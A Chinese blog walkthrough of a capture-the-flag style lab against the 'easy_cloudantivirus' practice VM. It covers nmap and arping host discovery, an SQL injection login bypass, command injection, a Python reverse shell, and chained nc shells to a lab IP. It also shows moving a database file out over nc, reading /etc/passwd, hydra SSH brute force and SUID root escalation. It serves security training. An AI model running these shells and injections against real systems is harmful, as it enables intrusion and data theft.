打靶第二周-easy_cloudantivirus

靶机地址

easy_cloudantivirus

攻击手段

  • 端口扫描
  • WEB侦查
  • SQL注入
  • 命令注入
  • 密码爆破
  • 代码审计
  • NC串联
  • 本地提权

所用工具

arping
nmap
hydra
nc
burp
sqlite

开始攻击

主机发现

使用arping来发现
因为arping一次只能扫一个可使用for i in $(seq 1 254);do arping -c 2 192.168.168.$i;done来扫描网段
在这里插入图片描述

也可使用nmap 192.168.168.0/24发现主机

在这里插入图片描述
可看到目标主机开了22和8080端口,扫描具体的端口和服务nmap -p22,8080 -sV 192.168.168.14
在这里插入图片描述

访问8080
在这里插入图片描述
发现是一个云病毒扫描
需要使用邀请码登录。
这样就有两种方法

  1. 暴力破解
  2. sql注入

sql注入

抓包后,可以尝试所有的特殊符号33个。发现"报错查看页面后
在这里插入图片描述
看到sql语句
select * from code where password="' + password + '"
这样就可以闭合sql语句
使用or 1=1使条件永为真
即输入"or 1=1--+
在这里插入图片描述
成功进入
当输入hello中时
在这里插入图片描述

命令执行

由上面得,我们猜测在后端执行的命令得逻辑为
avscan hello |ls
这样输入hello |ls得到
在这里插入图片描述
成功!

反弹shell

因为本机有python2环境,可使用上次使用的反弹shell

import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("192.168.168.13",4444));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);

但这次尝试nc反弹shell

查看是否有nc

hello |which nc
在这里插入图片描述
返回了路径,证明有nc

开启侦听nc反弹

kali端执行nc -nlvp 4444命令
浏览器执行hello |nc 192.168.168.13 4444 -e /bin/sh失败了
可能是因为此nc版本不支持-e参数
删除-e,可收到链接。
hello |nc 192.168.168.13 4444
在这里插入图片描述

nc串联

先在kali开启两个监听,分别监听3333和4444端口
在浏览器执行命令hello |nc 192.168.168.13 3333 |/bin/bash |nc 192.168.168.13 4444
两个nc都收到了返回,在3333端口执行命令,会在4444端口看到返回!
在这里插入图片描述
分析hello |nc 192.168.168.13 3333 |/bin/bash |nc 192.168.168.13 4444
执行后会先在3333端口建立链接,这时在3333输入任何命令都会调用/bin/bash,执行之后从4444端口输出

查看文件

有app.py和datebase.aql
file database.sql

尝试sqlite失败,这样可以下载下来查看

下载文件

开启nc侦听5555端口并将得到的数据存入db.sql。
nc -nlvp 5555 > db.sql
之后在3333端口执行nc 192.168.168.13 5555 < database.sql
在这里插入图片描述
并使用sqlite打开
在这里插入图片描述
可看到插入数据。

查看目标中有哪些用户

在3333端口执行cat /etc/passwd
在这里插入图片描述
使用cat /etc/passwd | grep /bin/bash筛选出具有shell执行权限的用户
在这里插入图片描述
有三个:root,cloudav,scanner

制作字典

创建vi user.txt
在这里插入图片描述
创建vi pass.txt
在这里插入图片描述

ssh爆破

命令hydra -L user.txt -P pass.txt ssh://192.168.168.14

在这里插入图片描述
可惜失败了!

查看其他文件

在上一级目录中发现了相同名称的文件
在这里插入图片描述
ls -l后发现updata_cloudav文件得所有者是root
在这里插入图片描述
这样若我们能进行命令注入将得到root权限
查看源文件cat update_cloudav.c
在这里插入图片描述
可看到在执行该文件时需在后面加命令
猜测
看到调用了log
猜测也可调用nc

提权

再次使用./update_cloudav "a|nc 192.168.168.13 5555 | /bin/bash |nc 192.168.168.13 6666"并监听5555和6666。
在这里插入图片描述
这样就得到了root权限!!

补充:暴力破解邀请码

kali自带字典位置/usr/share/wordlists
选中字典后使用burp suit进行爆破。

总结

本次实验包含

  • 主机发现
  • 端口扫描/服务发现
  • sql注入/爆破
  • 命令执行
  • ssh爆破
  • suid提权

勇于尝试,遇到失败转换思路,不要气馁。

评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值